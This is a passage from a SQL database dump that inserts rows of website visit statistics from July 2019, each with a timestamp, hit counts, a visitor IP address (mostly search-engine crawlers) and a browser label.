),(435665,1563272966,1,1,0,0,'8.29.198.27','other'),(435666,1563273383,1,1,0,0,'91.196.178.131','firefox'),(435667,1563273857,1,1,0,0,'66.249.69.58','chrome'),(435668,1563273880,1,1,0,0,'207.46.13.72','other'),(435669,1563274535,1,1,0,0,'8.29.198.25','other'),(435670,1563274641,1,1,0,0,'141.8.188.11','other'),(435671,1563274933,2,2,0,0,'157.55.39.71','other'),(435672,1563276305,1,1,0,0,'207.46.13.190','other'),(435673,1563276502,1,1,0,0,'91.196.178.93','chrome'),(435674,1563276942,1,1,0,0,'180.76.15.142','other'),(435675,1563276992,1,1,0,0,'141.8.188.29','other'),(435676,1563277264,1,1,0,0,'207.46.13.190','other'),(435677,1563277474,1,1,0,0,'66.249.69.62','chrome'),(435678,1563277530,1,1,0,0,'157.55.39.71','other'),(435679,1563277954,1,1,0,0,'209.163.117.216','chrome'),(435680,1563277969,1,1,0,0,'107.173.44.137','chrome'),(435681,1563278402,1,1,0,0,'37.53.90.175','chrome'),(435682,1563278544,2,2,0,0,'66.249.69.60','chrome'),(435683,1563278943,1,1,0,0,'180.76.15.22','other'),(435684,1563278983,1,1,0,0,'91.196.178.93','chrome'),(435685,1563279631,1,1,0,0,'40.77.167.58','other'),(435686,1563280120,2,2,0,0,'207.46.13.72','other'),(435687,1563280564,1,1,0,0,'66.249.69.58','chrome'),(435688,1563280596,1,1,0,0,'207.46.13.163','other'),(435689,1563281355,1,1,0,0,'91.196.178.93','chrome'),(435690,1563281789,2,2,0,0,'40.77.167.45','other'),(435691,1563282528,1,1,0,0,'91.196.178.67','chrome'),(435692,1563282931,1,1,0,0,'207.46.13.201','other'),(435693,1563283619,1,1,0,0,'207.46.13.72','other'),(435694,1563283806,2,2,0,0,'40.77.167.45','other'),(435695,1563283835,1,1,0,0,'8.29.198.25','other'),(435696,1563284191,1,1,0,0,'207.46.13.201','other'),(435697,1563285430,1,1,0,0,'8.29.198.26','other'),(435698,1563285681,1,1,0,0,'91.196.178.102','chrome'),(435699,1563286213,1,1,0,0,'40.77.167.45','other'),(435700,1563286551,1,1,0,0,'66.249.69.62','chrome'),(435701,1563287222,1,1,0,0,'66.249.75.124','chrome'),(435702,1563287879,1,1,0,0,'207.46.13.210','other'),(435703,1563289067,1,1,0,0,'40.77.167.45','other'),(435704,1563290118,1,1,0,0,'66.249.69.58','chrome'),(435705,1563290990,1,1,0,0,'207.46.13.163','other'),(435706,1563291769,1,1,0,0,'66.249.69.58','chrome'),(435707,1563292021,1,1,0,0,'40.77.167.45','other'),(435708,1563294587,1,1,0,0,'66.249.69.58','chrome'),(435709,1563294706,1,1,0,0,'8.29.198.27','other'),(435710,1563294869,1,1,0,0,'66.249.69.60','chrome'),(435711,1563295235,1,1,0,0,'207.46.13.62','other'),(435712,1563295607,1,1,0,0,'207.46.13.210','other'),(435713,1563295659,1,1,0,0,'40.77.167.93','other'),(435714,1563296339,1,1,0,0,'8.29.198.25','other'),(435715,1563297244,1,1,0,0,'157.55.39.207','other'),(435716,1563297504,2,2,0,0,'157.55.39.127','other'),(435717,1563297964,1,1,0,0,'5.45.207.76','other'),(435718,1563298437,2,2,0,0,'157.55.39.127','other'),(435719,1563300163,1,1,0,0,'178.154.171.24','other'),(435720,1563300167,1,1,0,0,'141.8.132.16','other'),(435721,1563300764,2,2,0,0,'157.55.39.127','other'),(435722,1563301632,1,1,0,0,'157.55.39.215','other'),(435723,1563301822,1,1,0,0,'91.196.178.174','chrome'),(435724,1563302816,1,1,0,0,'157.55.39.199','other'),(435725,1563302917,1,1,0,0,'95.134.184.5','chrome'),(435726,1563303238,2,2,0,0,'157.55.39.127','other'),(435727,1563303719,1,1,0,0,'5.255.253.22','other'),(435728,1563304366,1,1,0,0,'40.77.167.161','other'),(435729,1563304686,1,1,0,0,'178.133.155.110','chrome'),(435730,1563304842,1,1,0,0,'66.249.69.58','chrome'),(435731,1563304857,1,1,0,0,'157.55.39.127','other'),(435732,1563305429,1,1,0,0,'141.8.132.16','other'),(435733,1563305565,1,1,0,0,'8.29.198.27','other'),(435734,1563306754,1,1,0,0,'40.77.167.161','other'),(435735,1563307072,1,1,0,0,'66.249.69.58','chrome'),(435736,1563307075,1,1,0,0,'207.46.13.95','other'),(435737,1563307242,1,1,0,0,'8.29.198.26','other'),(435738,1563307584,1,1,0,0,'157.55.39.156','other'),(435739,1563308675,1,1,0,0,'5.255.253.25','other'),(435740,1563308691,1,1,0,0,'157.55.39.127','other'),(435741,1563309297,1,1,0,0,'207.46.13.95','other'),(435742,1563310848,1,1,0,0,'207.46.13.95','other'),(435743,1563312817,2,2,0,0,'144.76.60.198','other'),(435744,1563313963,2,2,0,0,'157.55.39.127','other'),(435745,1563314619,1,1,0,0,'40.77.167.161','other'),(435746,1563315562,1,1,0,0,'157.55.39.152','other'),(435747,1563315687,1,1,0,0,'66.249.69.58','chrome'),(435748,1563316067,1,1,0,0,'141.8.188.29','other'),(435749,1563316140,1,1,0,0,'87.250.224.47','other'),(435750,1563316160,1,1,0,0,'207.46.13.95','other'),(435751,1563316326,1,1,0,0,'180.76.15.144','other'),(435752,1563316432,1,1,0,0,'8.29.198.26','other'),(435753,1563317155,1,1,0,0,'157.55.39.127','other'),(435754,1563317222,1,1,0,0,'141.8.188.29','other'),(435755,1563317698,1,1,0,0,'51.68.152.26','chrome'),(435756,1563317742,1,1,0,0,'66.249.66.220','chrome'),(435757,1563317796,1,1,0,0,'157.55.39.152','other'),(435758,1563318111,1,1,0,0,'8.29.198.25','other'),(435759,1563318373,1,1,0,0,'66.249.66.222','chrome'),(435760,1563319201,1,1,0,0,'40.77.167.49','other'),(435761,1563319485,2,2,0,0,'40.77.167.89','other'),(435762,1563321251,2,2,0,0,'141.8.188.11','other'),(435763,1563321701,1,1,0,0,'207.46.13.97','other'),(435764,1563322783,1,1,0,0,'5.45.207.79','other'),(435765,1563323051,3,3,0,0,'207.46.13.16','other'),(435766,1563323090,1,1,0,0,'141.8.188.11','other'),(435767,1563324163,1,1,0,0,'207.46.13.97','other'),(435768,1563324518,1,1,0,0,'40.77.167.0','other'),(435769,1563324591,1,1,0,0,'66.249.66.222','chrome'),(435770,1563324705,1,1,0,0,'141.8.188.29','other'),(435771,1563325715,1,1,0,0,'66.249.66.218','chrome'),(435772,1563327078,1,1,0,0,'157.55.39.127','other'),(435773,1563327299,1,1,0,0,'8.29.198.25','other'),(435774,1563328775,1,1,0,0,'141.8.188.29','other'),(435775,1563328972,1,1,0,0,'8.29.198.26','other'),(435776,1563329193,1,1,0,0,'207.46.13.16','other'),(435777,1563329720,1,1,0,0,'40.77.167.33','other'),(435778,1563330268,1,1,0,0,'13.66.139.0','other'),(435779,1563330357,1,1,0,0,'66.249.66.128','chrome'),(435780,1563330766,1,1,0,0,'207.46.13.16','other'),(435781,1563330901,1,1,0,0,'34.221.160.197','other'),(435782,1563331026,1,1,0,0,'141.8.188.11','other'),(435783,1563331131,1,1,0,0,'40.77.167.33','other'),(435784,1563332856,1,1,0,0,'207.46.13.33','other'),(435785,1563333254,1,1,0,0,'207.46.13.16','other'),(435786,1563336053,1,1,0,0,'141.8.188.29','other'),(435787,1563336264,1,1,0,0,'141.8.188.11','other'),(435788,1563336290,2,2,0,0,'207.46.13.57','other'),(435789,1563337203,2,2,0,0,'207.46.13.57','other'),(435790,1563337938,1,1,0,0,'207.46.13.33','other'),(435791,1563338154,1,1,0,0,'8.29.198.25','other'),(435792,1563339413,2,2,0,0,'141.8.188.29','other'),(435793,1563339433,1,1,0,0,'207.46.13.129','other'),(435794,1563339874,1,1,0,0,'8.29.198.26','other'),(435795,1563340505,2,2,0,0,'207.46.13.33','other'),(435796,1563340711,2,2,0,0,'141.8.188.29','other'),(435797,1563340942,1,1,0,0,'141.8.188.11','other'),(435798,1563342045,1,1,0,0,'141.8.188.29','other'),(435799,1563343102,2,2,0,0,'141.8.188.29','other'),(435800,1563344086,1,1,0,0,'66.249.66.220','chrome'),(435801,1563344087,1,1,0,0,'207.46.13.57','other'),(435802,1563344401,1,1,0,0,'91.196.178.93','chrome'),(435803,1563345097,1,1,0,0,'95.132.17.178','chrome'),(435804,1563345372,1,1,0,0,'207.46.13.129','other'),(435805,1563346198,1,1,0,0,'207.46.13.33','other'),(435806,1563347889,1,1,0,0,'207.46.13.57','other'),(435807,1563348228,1,1,0,0,'91.196.178.93','chrome'),(435808,1563348519,1,1,0,0,'157.55.39.29','other'),(435809,1563349028,1,1,0,0,'8.29.198.27','other'),(435810,1563349475,1,1,0,0,'66.249.66.218','chrome'),(435811,1563350747,1,1,0,0,'8.29.198.27','other'),(435812,1563350965,1,1,0,0,'37.55.150.172','chrome'),(435813,1563351148,3,3,0,0,'141.8.188.29','other'),(435814,1563351284,1,1,0,0,'66.249.66.132','chrome'),(435815,1563351563,2,2,0,0,'193.0.206.55','firefox'),(435816,1563351610,1,1,0,0,'180.76.15.24','other'),(435817,1563352118,1,1,0,0,'37.73.157.143','chrome'),(435818,1563352608,1,1,0,0,'141.8.188.11','other'),(435819,1563352614,1,1,0,0,'207.46.13.57','other'),(435820,1563353689,1,1,0,0,'207.46.13.129','other'),(435821,1563353874,1,1,0,0,'66.249.66.220','chrome'),(435822,1563354293,1,1,0,0,'91.196.178.93','chrome'),(435823,1563354496,1,1,0,0,'78.111.188.10','chrome'),(435824,1563355014,1,1,0,0,'141.8.188.29','other'),(435825,1563355098,1,1,0,0,'207.46.13.129','other'),(435826,1563355589,1,1,0,0,'66.249.66.222','chrome'),(435827,1563356117,1,1,0,0,'157.55.39.29','other'),(435828,1563356228,1,1,0,0,'66.249.66.220','chrome'),(435829,1563356698,1,1,0,0,'95.108.181.75','other'),(435830,1563356949,1,1,0,0,'141.8.188.29','other'),(435831,1563357008,1,1,0,0,'5.45.207.79','other'),(435832,1563357304,1,1,0,0,'207.46.13.33','other'),(435833,1563357544,2,2,0,0,'141.8.188.11','other'),(435834,1563358144,1,1,0,0,'157.55.39.29','other'),(435835,1563358203,1,1,0,0,'66.249.66.218','chrome'),(435836,1563358293,1,1,0,0,'141.8.188.29','other'),(435837,1563358740,1,1,0,0,'207.46.13.33','other'),(435838,1563358765,1,1,0,0,'109.74.154.72','chrome'),(435839,1563358774,14321,14321,0,0,'85.233.153.26','firefox'),(435840,1563358851,1,1,0,0,'207.46.13.129','other'),(435841,1563359675,15396,15396,0,0,'85.233.153.26','firefox'),(435842,1563359896,1,1,0,0,'8.29.198.27','other'),(435843,1563359960,2,2,0,0,'95.213.141.126','opera'),(435844,1563359968,1,1,0,0,'95.132.0.74','chrome'),(435845,1563360576,16305,16305,0,0,'85.233.153.26','firefox'),(435846,1563360884,4668,4668,0,0,'77.123.91.81','firefox'),(435847,1563361122,1,1,0,0,'141.8.188.29','other'),(435848,1563361477,4585,4585,0,0,'85.233.153.26','firefox'),(435849,1563361643,1,1,0,0,'207.46.13.33','other'),(435850,1563361647,1,1,0,0,'8.29.198.26','other'),(435851,1563361766,1,1,0,0,'66.249.66.218','chrome'),(435852,1563361797,1,1,0,0,'40.77.167.17','other'),(435853,1563361933,1,1,0,0,'66.249.66.220','chrome'),(435854,1563362053,1,1,0,0,'141.8.188.29','other'),(435855,1563362435,1,1,0,0,'180.76.15.156','other'),(435856,1563362824,1,1,0,0,'207.46.13.33','other'),(435857,1563363087,1,1,0,0,'141.8.188.11','other'),(435858,1563363880,1,1,0,0,'91.196.178.170','chrome'),(435859,1563364143,4,4,0,0,'207.46.13.129','other'),(435860,1563365171,1,1,0,0,'66.249.66.220','chrome'),(435861,1563365425,1,1,0,0,'66.249.66.222','chrome'),(435862,1563365830,1,1,0,0,'40.77.167.122','other'),(435863,1563365981,1,1,0,0,'91.196.178.93','chrome'),(435864,1563366037,1,1,0,0,'157.55.39.2','other'),(435865,1563366595,1,1,0,0,'46.201.6.79','chrome'),(435866,1563367292,1,1,0,0,'66.249.66.128','chrome'),(435867,1563367293,1,1,0,0,'91.196.121.13','chrome'),(435868,1563367865,1,1,0,0,'40.77.167.17','other'),(435869,1563368352,1,1,0,0,'66.249.66.218','chrome'),(435870,1563368854,2,2,0,0,'40.77.167.122','other'),(435871,1563368864,1,1,0,0,'40.77.167.127','other'),(435872,1563368967,1,1,0,0,'195.20.154.174','chrome'),(435873,1563369184,1,1,0,0,'157.55.39.2','other'),(435874,1563369488,1,1,0,0,'91.196.121.13','chrome'),(435875,1563369703,2,2,0,0,'92.112.105.60','chrome'),(435876,1563369726,2,2,0,0,'91.196.178.93','chrome'),(435877,1563370765,1,1,0,0,'8.29.198.27','other'),(435878,1563370899,4,4,0,0,'157.55.39.166','other'),(435879,1563371047,1,1,0,0,'66.249.66.132','chrome'),(435880,1563371353,1,1,0,0,'40.77.167.17','other'),(435881,1563372315,2,2,0,0,'40.77.167.17','other'),(435882,1563372556,1,1,0,0,'8.29.198.25','other'),(435883,1563372869,2,2,0,0,'66.249.66.132','chrome'),(435884,1563372916,1,1,0,0,'157.55.39.166','other'),(435885,1563374361,1,1,0,0,'66.249.66.128','chrome'),(435886,1563374435,1,1,0,0,'66.249.66.220','chrome'),(435887,1563375308,2,2,0,0,'157.55.39.166','other'),(435888,1563375604,1,1,0,0,'141.8.188.11','other'),(435889,1563376509,1,1,0,0,'66.249.66.128','chrome'),(435890,1563376759,1,1,0,0,'66.249.66.222','chrome'),(435891,1563377005,1,1,0,0,'66.249.66.220','chrome'),(435892,1563377447,1,1,0,0,'157.55.39.2','other'),(435893,1563377943,1,1,0,0,'40.77.167.122','other'),(435894,1563378184,1,1,0,0,'141.8.188.29','other'),(435895,1563379262,2,2,0,0,'40.77.167.17','other'),(435896,1563379857,1,1,0,0,'157.55.39.2','other'),(435897,1563380820,1,1,0,0,'40.77.167.17','other'),(435898,1563380830,1,1,0,0,'157.55.39.2','other'),(435899,1563381338,1,1,0,0,'66.249.66.132','chrome'),(435900,1563381343,1,1,0,0,'66.249.66.220','chrome'),(435901,1563381392,1,1,0,0,'141.8.188.29','other'),(435902,1563381623,1,1,0,0,'8.29.198.25','other'),(435903,1563381790,1,1,0,0,'66.249.66.218','chrome'),(435904,1563382148,2,2,0,0,'40.77.167.122','other'),(435905,1563383428,1,1,0,0,'8.29.198.26','other'),(435906,1563383436,1,1,0,0,'141.8.188.11','other'),(435907,1563384939,1,1,0,0,'157.55.39.166','other'),(435908,1563386393,1,1,0,0,'141.8.188.29','other'),(435909,1563387234,1,1,0,0,'178.154.171.24','other'),(435910,1563387501,1,1,0,0,'37.9.113.103','other'),(435911,1563388659,1,1,0,0,'40.77.167.122','other'),(435912,1563388831,1,1,0,0,'66.249.66.132','chrome'),(435913,1563388993,1,1,0,0,'66.249.66.220','chrome'),(435914,1563389105,1,1,0,0,'5.255.253.25','other'),(435915,1563390365,2,2,0,0,'40.77.167.212','other'),(435916,1563390894,1,1,0,0,'66.249.66.218','chrome'),(435917,1563390951,2,2,0,0,'157.55.39.2','other'),(435918,1563392486,1,1,0,0,'8.29.198.26','other'),(435919,1563392522,2,2,0,0,'157.55.39.166','other'),(435920,1563392525,1,1,0,0,'87.250.224.107','other'),(435921,1563392651,1,1,0,0,'66.249.66.218','chrome'),(435922,1563392878,1,1,0,0,'141.8.142.103','other'),(435923,1563392929,1,1,0,0,'193.105.62.132','chrome'),(435924,1563393840,1,1,0,0,'157.55.39.99','other'),(435925,1563394250,1,1,0,0,'66.249.66.218','chrome'),(435926,1563394297,1,1,0,0,'8.29.198.26','other'),(435927,1563394996,1,1,0,0,'91.196.178.162','chrome'),(435928,1563395268,1,1,0,0,'157.55.39.99','other'),(435929,1563395370,1,1,0,0,'157.55.39.2','other'),(435930,1563396342,1,1,0,0,'66.249.66.132','chrome'),(435931,1563396411,1,1,0,0,'66.249.66.128','chrome'),(435932,1563397114,1,1,0,0,'66.249.66.130','chrome'),(435933,1563397283,2,2,0,0,'46.211.64.208','chrome'),(435934,1563397339,1,1,0,0,'66.249.66.222','chrome'),(435935,1563397362,1,1,0,0,'66.249.66.132','chrome'),(435936,1563397860,2,2,0,0,'66.249.66.220','chrome'),(435937,1563398853,1,1,0,0,'141.8.142.103','other'),(435938,1563399266,1,1,0,0,'37.9.113.148','other'),(435939,1563399510,1,1,0,0,'66.249.66.220','chrome'),(435940,1563399968,2,2,0,0,'66.249.66.218','chrome'),(435941,1563401240,1,1,0,0,'40.77.167.160','other'),(435942,1563401851,1,1,0,0,'157.55.39.2','other'),(435943,1563401870,1,1,0,0,'66.249.66.222','chrome'),(435944,1563402989,29,29,0,0,'34.229.24.100','other'),(435945,1563403351,1,1,0,0,'8.29.198.25','other'),(435946,1563403651,1,1,0,0,'213.180.203.9','other'),(435947,1563404082,11,11,0,0,'34.229.24.100','other'),(435948,1563404982,1,1,0,0,'87.250.224.65','other'),(435949,1563405142,1,1,0,0,'66.249.66.132','chrome'),(435950,1563405178,1,1,0,0,'8.29.198.27','other'),(435951,1563405216,1,1,0,0,'66.249.66.222','chrome'),(435952,1563405264,1,1,0,0,'66.249.66.220','chrome'),(435953,1563405318,8,8,0,0,'34.229.24.100','other'),(435954,1563405351,1,1,0,0,'66.249.66.128','chrome'),(435955,1563405516,2,2,0,0,'157.55.39.99','other'),(435956,1563406254,8,8,0,0,'34.229.24.100','other'),(435957,1563407124,1,1,0,0,'5.45.207.79','other'),(435958,1563408011,1,1,0,0,'66.249.66.218','chrome'),(435959,1563408561,1,1,0,0,'157.55.39.110','other'),(435960,1563408579,1,1,0,0,'66.249.66.220','chrome'),(435961,1563408800,2,2,0,0,'141.8.188.29','other'),(435962,1563409729,1,1,0,0,'207.46.13.106','other'),(435963,1563409771,1,1,0,0,'66.249.66.220','chrome'),(435964,1563409855,1,1,0,0,'157.55.39.110','other'),(435965,1563410038,1,1,0,0,'157.55.39.112','other'),(435966,1563410202,1,1,0,0,'141.8.142.191','other'),(435967,1563410647,1,1,0,0,'94.180.196.95','msie'),(435968,1563410689,1,1,0,0,'66.249.66.222','chrome'),(435969,1563410860,2,2,0,0,'13.66.139.0','other'),(435970,1563411305,1,1,0,0,'66.249.66.130','chrome'),(435971,1563411318,1,1,0,0,'141.8.188.29','other'),(435972,1563413200,1,1,0,0,'157.55.39.110','other'),(435973,1563414043,2,2,0,0,'66.249.66.222','chrome'),(435974,1563414048,1,1,0,0,'66.249.66.220','chrome'),(435975,1563414219,1,1,0,0,'8.29.198.26','other'),(435976,1563414225,1,1,0,0,'66.249.66.218','chrome'),(435977,1563415045,1,1,0,0,'213.180.203.53','other'),(435978,1563415242,1,1,0,0,'141.8.188.29','other'),(435979,1563415696,1,1,0,0,'157.55.39.112','other'),(435980,1563415833,1,1,0,0,'66.249.66.218','chrome'),(435981,1563416000,1,1,0,0,'5.45.207.19','other'),(435982,1563416021,1,1,0,0,'93.73.228.219','chrome'),(435983,1563416057,1,1,0,0,'8.29.198.27','other'),(435984,1563416255,1,1,0,0,'66.249.66.222','chrome'),(435985,1563416587,2,2,0,0,'207.46.13.106','other'),(435986,1563416912,1,1,0,0,'37.9.113.148','other'),(435987,1563417133,1,1,0,0,'141.8.142.103','other'),(435988,1563417330,1,1,0,0,'157.55.39.114','other'),(435989,1563418734,1,1,0,0,'141.8.188.29','other'),(435990,1563419612,2,2,0,0,'207.46.13.106','other'),(435991,1563419665,1,1,0,0,'66.249.66.218','chrome'),(435992,1563420306,2,2,0,0,'157.55.39.114','other'),(435993,1563421026,3,3,0,0,'66.249.66.222','chrome'),(435994,1563421099,2,2,0,0,'66.249.66.220','chrome'),(435995,1563421463,3,3,0,0,'66.249.66.218','chrome'),(435996,1563421559,2,2,0,0,'66.249.66.130','chrome'),(435997,1563422733,1,1,0,0,'66.249.66.222','chrome'),(435998,1563422788,2,2,0,0,'157.55.39.114','other'),(435999,1563423394,1,1,0,0,'141.8.188.11','other'),(436000,1563423812,1,1,0,0,'66.249.66.128','chrome'),(436001,1563424035,2,2,0,0,'207.46.13.106','other'),(436002,1563424435,1,1,0,0,'178.17.171.194','chrome'),(436003,1563424618,1,1,0,0,'66.249.66.222','chrome'),(436004,1563424660,1,1,0,0,'66.249.66.218','chrome'),(436005,1563424894,1,1,0,0,'157.55.39.112','other'),(436006,1563425068,1,1,0,0,'8.29.198.26','other'),(436007,1563425372,1,1,0,0,'40.77.167.168','other'),(436008,1563425485,1,1,0,0,'66.249.66.130','chrome'),(436009,1563425729,1,1,0,0,'66.249.66.222','chrome'),(436010,1563426289,1,1,0,0,'66.249.66.220','chrome'),(436011,1563426911,1,1,0,0,'8.29.198.26','other'),(436012,1563427608,1,1,0,0,'5.45.207.79','other'),(436013,1563428205,1,1,0,0,'66.249.66.220','chrome'),(436014,1563428421,2,2,0,0,'66.249.66.130','chrome'),(436015,1563428429,1,1,0,0,'91.196.178.93','chrome'),(436016,1563428631,1,1,0,0,'66.249.66.218','chrome'),(436017,1563429092,1,1,0,0,'40.77.167.95','other'),(436018,1563429355,1,1,0,0,'109.70.100.22','other'),(436019,1563429757,1,1,0,0,'40.77.167.57','other'),(436020,1563430116,1,1,0,0,'66.249.66.130','chrome'),(436021,1563430292,1,1,0,0,'66.249.66.222','chrome'),(436022,1563430390,1,1,0,0,'91.196.178.93','chrome'),(436023,1563430423,1,1,0,0,'66.249.66.220','chrome'),(436024,1563430673,1,1,0,0,'141.8.188.29','other'),(436025,1563431280,1,1,0,0,'13.66.139.0','other'),(436026,1563431444,3,3,0,0,'66.249.66.128','chrome'),(436027,1563431844,1,1,0,0,'141.8.188.29','other'),(436028,1563432106,1,1,0,0,'66.249.66.222','chrome'),(436029,1563432244,1,1,0,0,'66.249.66.220','chrome'),(436030,1563432284,1,1,0,0,'91.196.178.134','chrome'),(436031,1563432451,1,1,0,0,'40.77.167.57','other'),(436032,1563433212,1,1,0,0,'66.249.66.128','chrome'),(436033,1563433392,3,3,0,0,'66.249.66.222','chrome'),(436034,1563433456,3,3,0,0,'66.249.66.220','chrome'),(436035,1563433751,1,1,0,0,'47.254.36.223','firefox'),(436036,1563433833,2,2,0,0,'37.53.89.22','chrome'),(436037,1563434358,1,1,0,0,'212.115.239.54','chrome'),(436038,1563434552,3,3,0,0,'40.77.167.95','other'),(436039,1563434556,5,5,0,0,'157.55.39.81','other'),(436040,1563434561,6,6,0,0,'40.77.167.57','other'),(436041,1563434624,9,9,0,0,'40.77.167.168','other'),(436042,1563435018,1,1,0,0,'141.8.188.29','other'),(436043,1563435021,2,2,0,0,'66.249.66.218','chrome'),(436044,1563435149,1,1,0,0,'95.134.195.142','chrome'),(436045,1563435267,1,1,0,0,'66.249.66.220','chrome'),(436046,1563435504,2,2,0,0,'66.249.66.222','chrome'),(436047,1563435912,1,1,0,0,'8.29.198.27','other'),(436048,1563436107,1,1,0,0,'180.163.220.5','chrome'),(436049,1563436209,1,1,0,0,'180.163.220.68','chrome'),(436050,1563436249,1,1,0,0,'42.236.10.106','chrome'),(436051,1563436521,1,1,0,0,'141.8.188.11','other'),(436052,1563436557,1,1,0,0,'40.77.167.95','other'),(436053,1563437330,1,1,0,0,'66.249.66.220','chrome'),(436054,1563437761,1,1,0,0,'8.29.198.25','other'),(436055,1563437978,1,1,0,0,'141.8.188.29','other'),(436056,1563438266,1,1,0,0,'8.208.22.133','other'),(436057,1563438584,1,1,0,0,'157.55.39.231','other'),(436058,1563439721,1,1,0,0,'128.69.229.177','msie'),(436059,1563439804,1,1,0,0,'207.46.13.43','other'),(436060,1563440023,1,1,0,0,'157.55.39.166','other'),(436061,1563440662,1,1,0,0,'66.249.66.218','chrome'),(436062,1563440723,1,1,0,0,'66.249.66.222','chrome'),(436063,1563440850,1,1,0,0,'66.249.66.128','chrome'),(436064,1563440933,1,1,0,0,'130.180.219.118','chrome'),(436065,1563441009,1,1,0,0,'157.55.39.195','other'),(436066,1563441209,1,1,0,0,'141.8.188.29','other'),(436067,1563441264,1,1,0,0,'141.8.188.11','other'),(436068,1563441692,1,1,0,0,'138.201.243.66','firefox'),(436069,1563442082,1,1,0,0,'157.55.39.195','other'),(436070,1563442285,1,1,0,0,'5.58.150.120','chrome'),(436071,1563442446,1,1,0,0,'66.249.66.222','chrome'),(436072,1563442708,2,2,0,0,'66.249.66.220','chrome'),(436073,1563442739,1,1,0,0,'66.249.66.132','chrome'),(436074,1563443020,1,1,0,0,'157.55.39.195','other'),(436075,1563444504,2,2,0,0,'66.249.66.218','chrome'),(436076,1563444659,1,1,0,0,'157.55.39.166','other'),(436077,1563444897,1,1,0,0,'66.249.66.220','chrome'),(436078,1563445055,1,1,0,0,'66.249.66.128','chrome'),(436079,1563445529,1,1,0,0,'109.74.154.72','chrome'),(436080,1563445753,1,1,0,0,'141.8.188.11','other'),(436081,1563445871,2,2,0,0,'141.8.188.29','other'),(436082,1563446174,1,1,0,0,'207.46.13.224','other'),(436083,1563446353,1,1,0,0,'66.249.66.128','chrome'),(436084,1563446757,2,2,0,0,'66.249.66.220','chrome'),(436085,1563446759,1,1,0,0,'8.29.198.27','other'),(436086,1563446836,1,1,0,0,'157.55.39.166','other'),(436087,1563447026,1,1,0,0,'66.249.66.222','chrome'),(436088,1563447333,1,1,0,0,'40.77.167.90','other'),(436089,1563448336,1,1,0,0,'66.249.66.220','chrome'),(436090,1563448349,1,1,0,0,'141.8.188.11','other'),(436091,1563448604,1,1,0,0,'8.29.198.26','other'),(436092,1563449048,1,1,0,0,'66.249.66.128','chrome'),(436093,1563449342,2,2,0,0,'66.249.66.222','chrome'),(436094,1563449349,2,2,0,0,'66.249.66.220','chrome'),(436095,1563449915,2,2,0,0,'141.8.188.29','other'),(436096,1563450264,1,1,0,0,'180.76.15.21','other'),(436097,1563450467,4,4,0,0,'207.46.13.224','other'),(436098,1563450532,3,3,0,0,'157.55.39.166','other'),(436099,1563450745,1,1,0,0,'91.196.178.93','chrome'),(436100,1563451353,3,3,0,0,'66.249.66.220','chrome'),(436101,1563451407,1,1,0,0,'195.69.221.208','chrome'),(436102,1563451435,6,6,0,0,'66.249.66.222','chrome'),(436103,1563451905,1,1,0,0,'66.249.66.218','chrome'),(436104,1563452108,1,1,0,0,'207.46.13.224','other'),(436105,1563452158,1,1,0,0,'109.86.69.227','firefox'),(436106,1563452264,1,1,0,0,'180.76.15.147','other'),(436107,1563452378,1,1,0,0,'23.228.90.98','chrome'),(436108,1563453411,3,3,0,0,'66.249.66.222','chrome'),(436109,1563453424,1,1,0,0,'66.249.66.130','chrome'),(436110,1563453777,3,3,0,0,'66.249.66.218','chrome'),(436111,1563454408,1,1,0,0,'40.77.167.96','other'),(436112,1563454678,1,1,0,0,'66.249.66.220','chrome'),(436113,1563455053,1,1,0,0,'91.196.178.93','chrome'),(436114,1563455131,1,1,0,0,'91.196.177.46','chrome'),(436115,1563455223,1,1,0,0,'66.249.66.222','chrome'),(436116,1563456429,1,1,0,0,'66.249.66.128','chrome'),(436117,1563456896,1,1,0,0,'46.201.250.174','chrome'),(436118,1563457448,2,2,0,0,'66.249.66.222','chrome'),(436119,1563457629,1,1,0,0,'8.29.198.27','other'),(436120,1563457743,1,1,0,0,'157.55.39.166','other'),(436121,1563457850,1,1,0,0,'213.180.203.9','other'),(436122,1563457964,1,1,0,0,'95.108.213.4','other'),(436123,1563458393,1,1,0,0,'66.249.66.218','chrome'),(436124,1563459458,1,1,0,0,'8.29.198.26','other'),(436125,1563459464,1,1,0,0,'66.249.66.218','chrome'),(436126,1563460681,2,2,0,0,'66.249.66.222','chrome'),(436127,1563460734,2,2,0,0,'66.249.66.218','chrome'),(436128,1563460878,1,1,0,0,'157.55.39.166','other'),(436129,1563460925,2,2,0,0,'141.8.188.29','other'),(436130,1563461064,1,1,0,0,'157.55.39.197','other'),(436131,1563462045,1,1,0,0,'66.249.66.130','chrome'),(436132,1563462107,2,2,0,0,'141.8.142.65','other'),(436133,1563462361,1,1,0,0,'207.46.13.224','other'),(436134,1563462790,1,1,0,0,'66.249.66.220','chrome'),(436135,1563463251,1,1,0,0,'52.162.161.148','other'),(436136,1563463409,1,1,0,0,'87.250.224.81','other'),(436137,1563463937,1,1,0,0,'207.46.13.224','other'),(436138,1563464212,1,1,0,0,'66.249.66.222','chrome'),(436139,1563464458,1,1,0,0,'66.249.66.130','chrome'),(436140,1563464495,1,1,0,0,'66.249.66.220','chrome'),(436141,1563464838,1,1,0,0,'40.77.167.31','other'),(436142,1563466098,1,1,0,0,'66.249.66.222','chrome'),(436143,1563466116,1,1,0,0,'66.249.66.218','chrome'),(436144,1563466593,1,1,0,0,'157.55.39.197','other'),(436145,1563467888,1,1,0,0,'66.249.66.130','chrome'),(436146,1563467903,3,3,0,0,'66.249.66.218','chrome'),(436147,1563468274,1,1,0,0,'40.77.167.31','other'),(436148,1563468484,1,1,0,0,'8.29.198.27','other'),(436149,1563468664,2,2,0,0,'141.8.188.11','other'),(436150,1563469676,1,1,0,0,'40.77.167.15','other'),(436151,1563469862,1,1,0,0,'66.249.66.130','chrome'),(436152,1563469894,2,2,0,0,'66.249.66.220','chrome'),(436153,1563470329,1,1,0,0,'8.29.198.27','other'),(436154,1563471125,1,1,0,0,'66.249.66.220','chrome'),(436155,1563471350,1,1,0,0,'87.250.224.81','other'),(436156,1563471492,1,1,0,0,'40.77.167.15','other'),(436157,1563472912,1,1,0,0,'66.249.66.128','chrome'),(436158,1563473430,1,1,0,0,'66.249.66.222','chrome'),(436159,1563474141,1,1,0,0,'157.55.39.70','other'),(436160,1563474359,1,1,0,0,'46.211.100.81','chrome'),(436161,1563474562,1,1,0,0,'141.8.188.29','other'),(436162,1563474740,1,1,0,0,'66.249.66.130','chrome'),(436163,1563474887,1,1,0,0,'66.249.66.218','chrome'),(436164,1563475580,1,1,0,0,'66.249.66.222','chrome'),(436165,1563476234,1,1,0,0,'40.77.167.15','other'),(436166,1563476407,1,1,0,0,'141.8.188.29','other'),(436167,1563476947,1,1,0